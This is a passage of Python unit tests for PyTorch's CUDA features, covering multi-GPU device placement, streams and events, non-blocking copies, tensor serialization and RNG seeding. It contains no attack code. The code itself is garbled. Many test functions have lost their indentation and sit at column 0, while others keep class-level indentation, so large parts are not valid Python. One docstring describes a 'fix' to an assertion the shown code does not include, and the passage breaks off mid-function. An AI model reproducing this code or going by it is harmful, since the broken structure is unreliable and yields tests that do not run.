        tensor.fill_(1)
        self.assertTrue((tensor == 1).all())
    @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
    def test_autogpu(self):
        """New CUDA tensors land on the current device; ops follow their inputs' device."""
        x = torch.randn(5, 5).cuda()
        y = torch.randn(5, 5).cuda()
        self.assertEqual(x.get_device(), 0)
        self.assertEqual(x.get_device(), 0)
        with torch.cuda.device(1):
            z = torch.randn(5, 5).cuda()
            self.assertEqual(z.get_device(), 1)
            # add stays on device 0 because both operands live there
            q = x.add(y)
            self.assertEqual(q.get_device(), 0)
            w = torch.randn(5, 5).cuda()
            self.assertEqual(w.get_device(), 1)
            self.assertEqual(y.cuda().get_device(), 1)
        # outside the context, .cuda() targets the default device 0 again
        z = z.cuda()
        self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
    def _test_copy_sync_current_stream(self, x, y):
        """Check copy_ synchronizes on the current streams of both src and dst."""
        x_plus_one = x + 1
        s0 = torch.cuda.Stream(device=x.device)
        s1 = torch.cuda.Stream(device=y.device)
        s2 = torch.cuda.Stream(device=x.device)
        s3 = torch.cuda.Stream(device=y.device)
        # same dst stream different src streams
        with torch.cuda.stream(s0):
            torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
            with torch.cuda.stream(s1):
                y.copy_(x_plus_one)
        with torch.cuda.stream(s2), torch.cuda.stream(s1):
            y.copy_(x)
        s1.synchronize()
        # The copy() is synchronized on the current streams of both src and dst.
        # In the above test, the _sleep() op on s0 will not block the copy() on
        # s2, but both copies are synchronized on s1 in the dst device. Hence,
        # x is copied to y after x_plus_one is copied to y. If x and y are on
        # the same device, both copy() ops are synchronized on s1.
        self.assertEqual(y, x)
        # same src stream different dst streams
        with torch.cuda.stream(s1):
            torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
            with torch.cuda.stream(s0):
                y.copy_(x_plus_one)
        with torch.cuda.stream(s3), torch.cuda.stream(s0):
            y.copy_(x)
        s0.synchronize()
        # Similarly, both copy() ops are synchronized on s0.
        self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
    def test_to_non_blocking(self):
        """tensor.to(..., non_blocking=True) returns while the copy is still in flight."""
        stream = torch.cuda.current_stream()
        def _test_to_non_blocking(a, non_blocking, dst):
            torch.cuda.synchronize()
            # Pushes an 0.1 second spin to stream so if the copy is non blocking,
            # stream will almost surely be active when we query().
            torch.cuda._sleep(int(100 * get_cycles_per_ms()))
            b = a.to(device=dst, non_blocking=non_blocking)
            self.assertEqual(stream.query(), not non_blocking)
            stream.synchronize()
            self.assertEqual(a, b)
            # only a non-blocking cuda->cpu copy should land in pinned memory
            self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
        for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
            # Creates source on the opposite device from destination.
            src = torch.randn(1000000,
                              device="cuda" if dst == "cpu" else "cpu",
                              pin_memory=True if dst == "cuda" else False)
            _test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
    def test_serialization_array_with_storage(self):
        """Saving/loading CUDA tensors and a storage preserves types and aliasing."""
        x = torch.randn(5, 5).cuda()
        y = torch.IntTensor(2, 5).fill_(0).cuda()
        q = [x, y, x, y.storage()]
        with tempfile.NamedTemporaryFile() as f:
            torch.save(q, f)
            f.seek(0)
            q_copy = torch.load(f)
        self.assertEqual(q_copy, q, atol=0, rtol=0)
        q_copy[0].fill_(5)
        # entries 0 and 2 alias the same tensor, as in the original list
        self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
        self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
        self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
        self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
        self.assertTrue(isinstance(q_copy[3], torch.storage.TypedStorage))
        self.assertTrue(isinstance(q_copy[3]._storage, torch.cuda.UntypedStorage))
        # the restored storage aliases y's storage, so filling y updates it
        q_copy[1].fill_(10)
        self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
    def test_torch_manual_seed_seeds_cuda_devices(self):
        """torch.manual_seed also seeds the CUDA RNG, making uniform_ draws reproducible."""
        with freeze_rng_state():
            x = torch.zeros(4, 4).float().cuda()
            torch.manual_seed(2)
            self.assertEqual(torch.cuda.initial_seed(), 2)
            x.uniform_()
            # reseeding reproduces the identical sample
            torch.manual_seed(2)
            y = x.clone().uniform_()
            self.assertEqual(x, y)
            self.assertEqual(torch.cuda.initial_seed(), 2)
    def test_manual_seed(self):
        """torch.cuda.manual_seed makes both uniform_ and bernoulli draws reproducible."""
        with freeze_rng_state():
            x = torch.zeros(4, 4).float().cuda()
            torch.cuda.manual_seed(2)
            self.assertEqual(torch.cuda.initial_seed(), 2)
            x.uniform_()
            a = torch.bernoulli(torch.full_like(x, 0.5))
            # reseeding reproduces both samples in order
            torch.cuda.manual_seed(2)
            y = x.clone().uniform_()
            b = torch.bernoulli(torch.full_like(x, 0.5))
            self.assertEqual(x, y)
            self.assertEqual(a, b)
            self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
    @unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
    def test_load_nonexistent_device(self):
        """Deserializing onto a CUDA device index that doesn't exist raises RuntimeError."""
        # Setup: create a serialized file object with a 'cuda:9' restore location
        tensor = torch.randn(2, device='cuda')
        buf = io.BytesIO()
        torch.save(tensor, buf)
        # NB: this might not work in the future if serialization changes
        buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
        msg = r'Attempting to deserialize object on CUDA device 9'
        with self.assertRaisesRegex(RuntimeError, msg):
            _ = torch.load(buf)
    def test_specify_improper_device_name(self):
        """torch.load with a malformed device string like 'cuda0' raises RuntimeError."""
        import os
        fname = "tempfile.pt"
        try:
            with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
                torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
                           _use_new_zipfile_serialization=True)
                # the save above is expected to succeed; the error comes from this load
                torch.load(fname, 'cuda0')
        finally:
            # clean up the temp file regardless of outcome
            if os.path.exists(fname):
                os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
    @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
    def test_multigpu_serialization_remap(self):
        """A map_location callable can move cuda:1 tensors onto cuda:0 at load time."""
        x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
        def gpu_remap(storage, location):
            if location == 'cuda:1':
                return storage.cuda(0)
            # returning None falls back to torch.load's default restore behavior
        with tempfile.NamedTemporaryFile() as f:
            torch.save(x, f)
            f.seek(0)
            x_copy = torch.load(f, map_location=gpu_remap)
        for original, copy in zip(x, x_copy):
            self.assertEqual(copy, original)
            self.assertIs(type(copy), type(original))
            self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
    @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
    def test_cuda_set_device(self):
        """set_device changes the default device; device() contexts nest and restore it."""
        x = torch.randn(5, 5)
        with torch.cuda.device(1):
            self.assertEqual(x.cuda().get_device(), 1)
            torch.cuda.set_device(0)
            self.assertEqual(x.cuda().get_device(), 0)
            with torch.cuda.device(1):
                self.assertEqual(x.cuda().get_device(), 1)
            # inner context exits back to the set_device(0) state
            self.assertEqual(x.cuda().get_device(), 0)
            torch.cuda.set_device(1)
        # leaving the outer context restores device 0
        self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
    @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
    def test_current_stream(self):
        """current_stream() reflects the active device and accepts explicit devices."""
        d0 = torch.device('cuda:0')
        d1 = torch.device('cuda:1')
        s0 = torch.cuda.current_stream()
        s1 = torch.cuda.current_stream(device=1)
        s2 = torch.cuda.current_stream(device=0)
        self.assertEqual(d0, s0.device)
        self.assertEqual(d1, s1.device)
        self.assertEqual(d0, s2.device)
        # no-argument and device=0 forms agree while device 0 is current
        self.assertEqual(s0, s2)
        with torch.cuda.device(d1):
            s0 = torch.cuda.current_stream()
            s1 = torch.cuda.current_stream(1)
            s2 = torch.cuda.current_stream(d0)
        self.assertEqual(d1, s0.device)
        self.assertEqual(d1, s1.device)
        self.assertEqual(d0, s2.device)
        self.assertEqual(s0, s1)
        with self.assertRaisesRegex(ValueError,
                                    "Expected a cuda device, but got: cpu"):
            torch.cuda.current_stream(torch.device('cpu'))
    @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
    @skipCUDANonDefaultStreamIf(True)
    def test_default_stream(self):
        """default_stream() is per-device and is the current stream by default."""
        d0 = torch.device('cuda:0')
        d1 = torch.device('cuda:1')
        with torch.cuda.device(d0):
            s0 = torch.cuda.default_stream()
        with torch.cuda.device(d1):
            s1 = torch.cuda.default_stream()
        s2 = torch.cuda.default_stream(device=0)
        s3 = torch.cuda.default_stream(d1)
        self.assertEqual(d0, s0.device)
        self.assertEqual(d1, s1.device)
        self.assertEqual(d0, s2.device)
        self.assertEqual(d1, s3.device)
        # the same device yields the same default stream regardless of how it's asked
        self.assertEqual(s0, s2)
        self.assertEqual(s1, s3)
        with torch.cuda.device(d0):
            self.assertEqual(torch.cuda.current_stream(), s0)
        with torch.cuda.device(d1):
            self.assertEqual(torch.cuda.current_stream(), s1)
        with self.assertRaisesRegex(ValueError,
                                    "Expected a cuda device, but got: cpu"):
            torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
    @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
    def test_stream_context(self):
        """stream() contexts switch both stream and device, and restore both on exit."""
        s0 = torch.cuda.current_stream()
        s1 = torch.cuda.Stream(device=1)
        s2 = torch.cuda.Stream(device=0)
        with torch.cuda.device(s1.device):
            prev_stream_on_cuda1 = torch.cuda.current_stream()
        self.assertEqual(torch.cuda.current_stream(), s0)
        self.assertEqual(0, torch.cuda.current_device())
        with torch.cuda.stream(s1):
            self.assertEqual(torch.cuda.current_stream(), s1)
            self.assertEqual(1, torch.cuda.current_device())
            with torch.cuda.stream(s2):
                self.assertEqual(torch.cuda.current_stream(), s2)
                self.assertEqual(0, torch.cuda.current_device())
                with torch.cuda.stream(s0):
                    self.assertEqual(torch.cuda.current_stream(), s0)
                    self.assertEqual(0, torch.cuda.current_device())
                # popping a stream context restores the previous stream and device
                self.assertEqual(torch.cuda.current_stream(), s2)
                self.assertEqual(0, torch.cuda.current_device())
            self.assertEqual(torch.cuda.current_stream(), s1)
            self.assertEqual(1, torch.cuda.current_device())
        # cuda:1's current stream is back to what it was before the contexts
        with torch.cuda.device(s1.device):
            self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
        self.assertEqual(torch.cuda.current_stream(), s0)
        self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
    @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
    def test_streams_multi_gpu_query(self):
        """Stream.query reports per-stream completion regardless of the current device."""
        d0 = torch.device('cuda:0')
        d1 = torch.device('cuda:1')
        torch.cuda.synchronize(d0)
        torch.cuda.synchronize(d1)
        with torch.cuda.device(d0):
            s0 = torch.cuda.current_stream()
        with torch.cuda.device(d1):
            s1 = torch.cuda.current_stream()
            # keep s1 busy so query() below observes it as still running
            torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
        self.assertTrue(s0.query())
        self.assertFalse(s1.query())
        with torch.cuda.device(d0):
            self.assertTrue(s0.query())
            self.assertFalse(s1.query())
        with torch.cuda.device(d1):
            self.assertTrue(s0.query())
            self.assertFalse(s1.query())
        # deliberately using a different device
        with torch.cuda.device(d0):
            s1.synchronize()
        self.assertTrue(s0.query())
        self.assertTrue(s1.query())
        with torch.cuda.device(d0):
            self.assertTrue(s0.query())
            self.assertTrue(s1.query())
        with torch.cuda.device(d1):
            self.assertTrue(s0.query())
            self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
    @staticmethod
    def _stream_synchronize(self, spin_time_cycles):
        """Spin for *spin_time_cycles*, sync via Stream.synchronize, return elapsed ms."""
        s = torch.cuda.current_stream()
        e_tik = torch.cuda.Event(enable_timing=True)
        e_tok = torch.cuda.Event(enable_timing=True)
        e_tik.record(s)
        torch.cuda._sleep(spin_time_cycles)
        e_tok.record(s)
        s.synchronize()
        self.assertTrue(s.query())
        # not necessary to check e_tik and e_tok, as elapsed_time would throw
        # exception if otherwise.
        return e_tik.elapsed_time(e_tok)
    @staticmethod
    def _event_synchronize(self, spin_time_cycles):
        """Spin for *spin_time_cycles*, sync via Event.synchronize, return elapsed ms."""
        s = torch.cuda.current_stream()
        e_tik = torch.cuda.Event(enable_timing=True)
        e_tok = torch.cuda.Event(enable_timing=True)
        e_tik.record(s)
        torch.cuda._sleep(spin_time_cycles)
        s.record_event(e_tok)
        e_tok.synchronize()
        self.assertTrue(s.query())
        # not necessary to check e_tik and e_tok, as elapsed_time would throw
        # exception if otherwise.
        return e_tik.elapsed_time(e_tok)
    @staticmethod
    def _event_wait(self, spin_time_cycles):
        """Spin on the current stream, hand off to a second stream via Event.wait,
        and return the elapsed time in ms."""
        s0 = torch.cuda.current_stream()
        s1 = torch.cuda.Stream()
        e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
        e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
        e_tik.record(s0)
        torch.cuda._sleep(spin_time_cycles - 10)
        e_sync = torch.cuda.Event(blocking=True)
        e_sync.record()
        # s1 waits for e_sync, i.e. for s0's spin to finish, before its own sleep
        e_sync.wait(s1)
        with torch.cuda.stream(s1):
            torch.cuda._sleep(10)
        s1.synchronize()
        e_tok.record()
        e_tok.synchronize()
        self.assertTrue(s0.query())
        self.assertTrue(s1.query())
        self.assertTrue(e_sync.query())
        # not necessary to check e_tik and e_tok, as elapsed_time would throw
        # exception if otherwise.
        return e_tik.elapsed_time(e_tok)
    @staticmethod
    def _test_stream_event_nogil(self, sync_func, p2c, c2p):
        """Child-thread body: run *sync_func* on cuda:1, coordinating via the queues."""
        with torch.cuda.device('cuda:1'):
            c2p.put(0)  # signal readiness to the parent
            p2c.get()   # wait for the parent's go-ahead
            c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
    # Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
    @skipIfRocm
    @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
    def test_stream_event_nogil(self):
        """CUDA sync calls release the GIL, so parent/child synchronizations overlap."""
        for sync_func in [TestCuda._stream_synchronize,
                          TestCuda._event_synchronize,
                          TestCuda._event_wait]:
            p2c = queue.Queue()
            c2p = queue.Queue()
            e_tik = torch.cuda.Event(enable_timing=True)
            e_tok = torch.cuda.Event(enable_timing=True)
            t = threading.Thread(
                target=TestCuda._test_stream_event_nogil,
                args=(self, sync_func, p2c, c2p))
            t.daemon = True
            t.start()
            c2p.get()
            with torch.cuda.device('cuda:0'):
                e_tik.record()
                p2c.put(0)
                parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
                child_time = c2p.get()
                e_tok.record()
                e_tok.synchronize()
                total_time = e_tik.elapsed_time(e_tok)
            # Without GIL, synchronizations in parent and child threads can
            # overlap. The total execution time should be a little bit longer
            # than spinning fifty million cycles and much shorter than twice of
            # that. However, testing absolute execution time is not reliable as
            # it may vary on different hardware in different environments.
            # Therefore, this test uses relative comparisons, checking if the
            # sum of parent and child threads execution time is greater than the
            # real execution time by least 40%.
            self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
    """Stream.wait_event() across devices.

    An event recorded on cuda:0's busy stream is waited on by cuda:1's
    stream; after s1.synchronize() both streams must be idle.
    """
    d0 = torch.device('cuda:0')
    d1 = torch.device('cuda:1')
    torch.cuda.synchronize(d0)
    torch.cuda.synchronize(d1)
    with torch.cuda.device(d0):
        s0 = torch.cuda.current_stream()
        torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
        e0 = torch.cuda.Event()
        s0.record_event(e0)
    with torch.cuda.device(d1):
        s1 = torch.cuda.current_stream()
    # s0 is still spinning; s1 has no work yet.
    self.assertFalse(s0.query())
    self.assertTrue(s1.query())
    s1.wait_event(e0)
    s1.synchronize()
    # Syncing s1 transitively waits for e0, hence for s0's spin as well.
    self.assertTrue(e0.query())
    self.assertTrue(s0.query())
    self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
    """Event.query() must report the same status regardless of which device
    is current when it is called."""
    d0 = torch.device('cuda:0')
    d1 = torch.device('cuda:1')
    with torch.cuda.device(d0):
        s0 = torch.cuda.current_stream()
        e0 = s0.record_event()
        s0.synchronize()
    with torch.cuda.device(d1):
        s1 = torch.cuda.current_stream()
        torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
        e1 = s1.record_event()
    # e0 completed (s0 was synced); e1 is still pending behind the spin.
    self.assertTrue(e0.query())
    self.assertFalse(e1.query())
    with torch.cuda.device(d0):
        self.assertTrue(e0.query())
        self.assertFalse(e1.query())
    with torch.cuda.device(d1):
        self.assertTrue(e0.query())
        self.assertFalse(e1.query())
    # deliberately using a different device
    with torch.cuda.device(d0):
        e1.synchronize()
    # After synchronizing e1 both events are done, from either device's view.
    self.assertTrue(e0.query())
    self.assertTrue(e1.query())
    with torch.cuda.device(d0):
        self.assertTrue(e0.query())
        self.assertTrue(e1.query())
    with torch.cuda.device(d1):
        self.assertTrue(e0.query())
        self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
    """elapsed_time() between events on different devices must raise;
    between events on the same device it must work from any current device."""
    d0 = torch.device('cuda:0')
    d1 = torch.device('cuda:1')
    with torch.cuda.device(d0):
        s0 = torch.cuda.current_stream()
        e0 = torch.cuda.Event(enable_timing=True)
        torch.cuda._sleep(10)
        s0.record_event(e0)
    with torch.cuda.device(d1):
        s1 = torch.cuda.current_stream()
        e1 = torch.cuda.Event(enable_timing=True)
        torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
        s1.record_event(e1)
    e0.synchronize()
    e1.synchronize()
    # Cross-device pairs raise, no matter which device is current.
    with torch.cuda.device(d0):
        with self.assertRaises(RuntimeError):
            self.assertGreater(e0.elapsed_time(e1), 0)
    with torch.cuda.device(d1):
        with self.assertRaises(RuntimeError):
            self.assertGreater(e0.elapsed_time(e1), 0)
    # Same-device pair (e0, e2 both on d0) works.
    with torch.cuda.device(d0):
        s0 = torch.cuda.current_stream()
        e2 = torch.cuda.Event(enable_timing=True)
        torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
        s0.record_event(e2)
        s0.synchronize()
    self.assertGreater(e0.elapsed_time(e2), 0)
    # deliberately calling from a different device
    with torch.cuda.device(d1):
        self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
    """record_stream() must delay re-use of a tensor's memory block until the
    recorded stream's pending work finishes, and allow re-use afterwards.

    Fix: the first assertion's failure message read "re-used to soon";
    corrected to "too soon" (matching the caching-pinned-memory tests).
    """
    cycles_per_ms = get_cycles_per_ms()

    t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
    result = torch.cuda.FloatTensor(t.size())
    stream = torch.cuda.Stream()
    ptr = [None]

    # Performs the CPU->GPU copy in a background stream
    def perform_copy():
        with torch.cuda.stream(stream):
            tmp = t.cuda(non_blocking=True)
